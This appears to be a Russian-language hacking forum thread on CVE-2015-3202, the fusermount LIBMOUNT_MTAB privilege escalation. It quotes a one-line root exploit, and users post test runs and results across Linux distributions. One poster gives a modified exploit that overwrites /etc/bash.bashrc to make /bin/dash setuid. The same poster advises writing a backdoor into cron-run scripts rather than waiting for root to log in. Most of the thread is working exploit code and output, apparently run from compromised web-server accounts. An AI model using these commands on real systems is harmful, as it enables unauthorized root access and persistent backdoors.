CVE-2015-3202 Linux fusermount privilege escalation via LIBMOUNT_MTAB env

[SynQ]

CVE-2015-3202

Цитата:

@taviso: a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202

https://gist.github.com/taviso/ecb70eb12d461dd85cba

Запустил по разу - на юбунте работает, на сентоси 6 нет прав на запуск.

Код:

$ ll /bin/fusermount
-rwsr-x--- 1 root fuse 29196 Dec  7  2011 /bin/fusermount*

[12309]

opensuse 13.2

Код:

-rwsr-xr-x 1 root trusted 31504 Sep 25  2014 /usr/bin/fusermount

эксплоит не работает.

centos 6 действительно -rwsr-x---

debian 7

Код:

-rwsr-xr-- 1 root fuse 30864 Jan  2  2013 /bin/fusermount

ubuntu 14.10

Код:

-rwsr-xr-x 1 root root 30800 Dec 16  2013 /bin/fusermount

эксплоит работает!

[пЭшка]

Код:

$ a=/tmp/.$$;b=chmod\ u+sx;echo $b /var/tmp/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a
/bin/sh: 5: a+=;/tmp/.5590: not found
mkdir: cannot create directory `/tmp/.5590': File exists
fusermount: failed to open /etc/fuse.conf: Permission denied
fusermount: mountpoint is not empty
fusermount: if you are sure this is safe, use the 'nonempty' mount option
$ ls -al 
total 112
drwxrwxrwt  2 root     root       4096 May 22 09:49 .
drwxr-xr-x 17 root     root       4096 Jan 20 07:08 ..
-rwxr-xr-x  1 www-data www-data 100284 May 22 09:49 sh
$ cat /etc/issue
Ubuntu 12.04.3 LTS \n \l

-rwsr-xr-x 1 root root 26252 Mar  2  2012 /bin/fusermount

не работает

[nikp]

Linux Mint 17 Qiana

Код:

-rwsr-xr-x 1 root root 30112 дек.  16  2013 /bin/fusermount
-rw-r----- 1 root fuse 280 мая   24  2013 /etc/fuse.conf

fusermount: failed to open /etc/fuse.conf: Permission denied

[romashka_sky]

Цитата:

Сообщение от nikp

Linux Mint 17 Qiana

Код:

-rwsr-xr-x 1 root root 30112 дек.  16  2013 /bin/fusermount
-rw-r----- 1 root fuse 280 мая   24  2013 /etc/fuse.conf

fusermount: failed to open /etc/fuse.conf: Permission denied

Так и должно быть. При логине root поставит suid-бит для /bin/sh.

[l1ght]

Ubuntu 14.04.1 LTS

Код:

$ a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a
fusermount: failed to open /etc/fuse.conf: Permission denied
fusermount: mountpoint is not empty
fusermount: if you are sure this is safe, use the 'nonempty' mount option
$ ls -lia /etc/bash.bashrc
130531 -rw-r--r-- 1 root root 1,7k Mar 23  2014 /etc/bash.bashrc
$ echo $0;ls -lia /etc/$0.$0rc
/bin/sh
ls: cannot access /etc//bin/sh./bin/shrc: No such file or directory

->

Код:

$ printf "chmod 4755 /bin/dash" > /tmp/exploit && chmod 755 /tmp/exploit
$ mkdir -p '/tmp/exploit||/tmp/exploit'
$ LIBMOUNT_MTAB=/etc/bash.bashrc  _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit'
$ cat /etc/bash.bashrc
/dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=www-data 0 0
$ ls -lia /etc/bash.bashrc
130531 -rw-r--r-- 1 root root 78 May 22 15:43 /etc/bash.bashrc

добавлю, что ждать захода рута и ждать пока он увидит ошибки вообще не айс, делаем ps aux / ищем всякие bash скрипты в кроне и вместо /etc/bash.bashrc пишем туда запуск нашего бекдора = profit

[ewi]

Код:

$ a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a
sending file descriptor: Socket operation on non-socket

$ uname -a
Linux *** 2.6.26.8-57.fc8 #1 SMP Thu Dec 18 19:19:45 EST 2008 i686 i686 i386 GNU/Linux

Код:

-rwsr-xr-x 1 root root 24K Sep 28 2008 /bin/fusermount